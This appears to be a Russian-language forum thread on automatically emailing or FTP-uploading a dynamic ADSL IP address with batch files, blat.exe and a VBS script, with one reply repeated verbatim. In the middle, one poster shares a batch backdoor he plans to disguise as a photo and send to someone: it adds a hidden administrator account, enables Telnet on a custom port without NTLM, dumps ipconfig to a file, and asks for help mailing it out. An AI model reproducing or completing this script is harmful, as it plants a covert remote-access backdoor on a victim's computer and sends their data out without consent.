Отправка по почте IP-адреса подключения ADSL

Greyman

Re: Отправка по почте IP-адреса подключения ADSL

Сообщение Greyman »

Georgiy
Цитата:

Автору темы, пожалуй, больше подходит вариант, который предложил я. Ведь команда tracert, если я не ошибаюсь, не дает IP-адрес клиента:

Твой вариант - тока частный случай, когда локальный адрес компа присваивается автоматически самим модемом. Мой вариант тоже не универсален, т. к. как раз такой случай он и не учитывает, а подходит для случая с использованием маршрутизатора (все равно какого, аппаратного или из компа). Соответственно для разного случая подключения можно использовать ту или иную команду, либо сделать вообще универсальый набор инфы, объединив результаты обоих этих команд.
dimich22

Сообщение dimich22 »

Для заливки файла на некоторый ftp-сервер можно в командный файл вставить следующую строку:

ftp -i -s:C:\auto\ftp.txt

-i убирает вывод запросов;

-s указывает текстовый файл с ftp-командами. Эти команды выполняются автоматически после запуска команды ftp. Значение данного параметра не должно содержать пробелов. Данный параметр следует использовать вместо перенаправления (> myip.txt

blat261\full\blat.exe C:\auto\myip.txt -to mywork@mail.ru -subject "My home IP" -charset windows-1251

del myip.txt

[/b]

2) Скопировать все в ту же папку C:\auto скрипт dimich22 и создать один командный файл C:\auto\send.cmd со следующим содержимым:

@rasdial ADSL ptn ptn

cscript showmyip.vbs >> myip.txt

del myip.txt

Содержимое файла ftp.txt приведено выше. Удаление производится из-за того, что скрипт определения IP дописывает информацию, а не перезаписывает. Можно и не удалять или подправить скрипт.

Для Gozya же подходит второй вариант.

>> но какбы сделать чтобы при изменении IP

как часто меняется IP? Может быть можно использовать планировщик Windows, который и будет вызывать командный файл send.cmd?
Gozya

Сообщение Gozya »

Для заливки файла на некоторый ftp-сервер можно в командный файл вставить следующую строку:

-i убирает вывод запросов;

-s указывает текстовый файл с ftp-командами. Эти команды выполняются автоматически после запуска команды ftp. Значение данного параметра не должно содержать пробелов. Данный параметр следует использовать вместо перенаправления (> myip.txt

blat261\full\blat.exe C:\auto\myip.txt -to mywork@mail.ru -subject "My home IP" -charset windows-1251

del myip.txt

[/b]

2) Скопировать все в ту же папку C:\auto скрипт dimich22 и создать один командный файл C:\auto\send.cmd со следующим содержимым:

@rasdial ADSL ptn ptn

cscript showmyip.vbs >> myip.txt

del myip.txt

Содержимое файла ftp.txt приведено выше. Удаление производится из-за того, что скрипт определения IP дописывает информацию, а не перезаписывает. Можно и не удалять или подправить скрипт.

Для Gozya же подходит второй вариант.

>> но какбы сделать чтобы при изменении IP

как часто меняется IP? Может быть можно использовать планировщик Windows, который и будет вызывать командный файл send.cmd?
Negativ

Сообщение Negativ »

Qwe1

Gozya

Уважаемые вы совсем забыли о безопасности. Если Radmin будет слушаться на внешнем интерфейсе вашего компьютера, то попасть на ваш компьютер не составит большого труда. Я бы посоветовал VPN для Radmin'о подобных программ.
Negativ

Сообщение Negativ »

>>как часто меняется IP?

на самом деле IP должен меняться тока при начале новой сессии соединения, но иногда провайдер сам его сбрасует вынудив модем переконектится.

О радмине или VPN речь идти не может, они требовательны к трафику, а я на работе имею слабый канал, та и ненужны мне их функции. Это конечно касается меня, не Qwe1.

Всем спасибо за ответы, скоро разгребусь с делами и буду пробовать.
Vyacheslav.Sedoy

Сообщение Vyacheslav.Sedoy »

вундыркинды что в компьютерах шарят_____есть такие на форуме
Vyacheslav.Sedoy

Сообщение Vyacheslav.Sedoy »

ТЕМА ХОРОШАЯ НО Я ВОПРОС НЕ МНОГО ПО ДРУГОМУ ПОСТАВЛЮ ЗНАЧИТ ТАК :

ЕСТЬ Пакетный файл MS-DOS КОТОРЫЙ Я СОБИРАЮСЬ СКЛЕЕТЬ С ФОТОГРАФИЕЙ

И НАМЕРЕН ЗАКИНУТЬ НУЖНОМУ ЧЕЛУ____

НАШЕЛ СКРИПТ НА ОТКРЫТИЕ ПОРТА telnet С ПРОВАМИ АДМИНА

chcp 1251

net user SUPPORT_388945a0 /delete

net user support hacker /add

net localgroup Администраторы support /add

net localgroup Пользователи SUPPORT_388945a0 /del

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "support" /t reg_dword /d 0 y

sc config tlntsvr start= auto

tlntadmn config port=972 sec=-NTLM

net start Telnet

ЗНАЧИТ ПОТОМ ВЫТЯГИВАЮ НУЖНУЮ ИНФОРМАЦИЮ ИЗ КОМПЬЮТЕРА ФАЙЛ ЛОЖИТЬСЯ

C:\ip.txt

ПРИ ПОМОЩИ КОМАНДЫ

cmd.exe /c ipconfig > C:\ip.txt

И ТЕПЕРЬ МНЕ БЫ СКРИПТ ЧТО БЫ ЭТОТ ФАЙЛ НАХОДЯЩИЙСЯ В C:\ip.txt

ЧЕРЕЗ Telnet ПЕРЕКИНУТЬ К СЕБЕ НА ПОЧТУ mail.ru

вот хотел бы спросить у ведующих людей РАЗБИРАЮЩИХ В ЭТОМ ДЕЛЕ

ПОМОЧЬ ЦЕЛИКОМ ______ПРОПИСАТЬ СКРИПТ ОТ А ДО Я

ДЕЛО В ТОМ ЧТО Я В ЭТОМ ДЕЛЕ МАЛО ЧТО СЕКУ________

ПАРНИ ПОМОЖЕТЕ ?
Sayan

Сообщение Sayan »

дайте ктото ссилку на ети скрипты пожалуйста-очень надо!
Sayan

Сообщение Sayan »

Основная масса современных ADSL, настривается в качестве router и имеет функционал DynDNS.

Если у Вас модем работает в режиме моста, то клиент DynDNS можно установить на ОС.

Таким образом Вы получите доменное имя третьего уровня, которое будет всегда разрешаться в действительный IP-адрес подключения.

PS: VPN для RAdmin можно и не делать, если есть возможность ограничить подключения (межсетевым экраном) с учетом адресов подключений - на работе у Вас скорее ввсего будет использовать выход в Инет со статического адреса.
StarFox

Сообщение StarFox »

Цитата dimich22:

Узнать свой внешний ip можно через скрипт

Запускаем его т.о. cscript showmyip.vbs >> myip.txt и отправляем этот файлик, как это предлагалось выше
Отправка по почте IP-адреса подключения ADSL

можно ли перезалить скрипт ?
Ответить

Вернуться в «Сетевые технологии»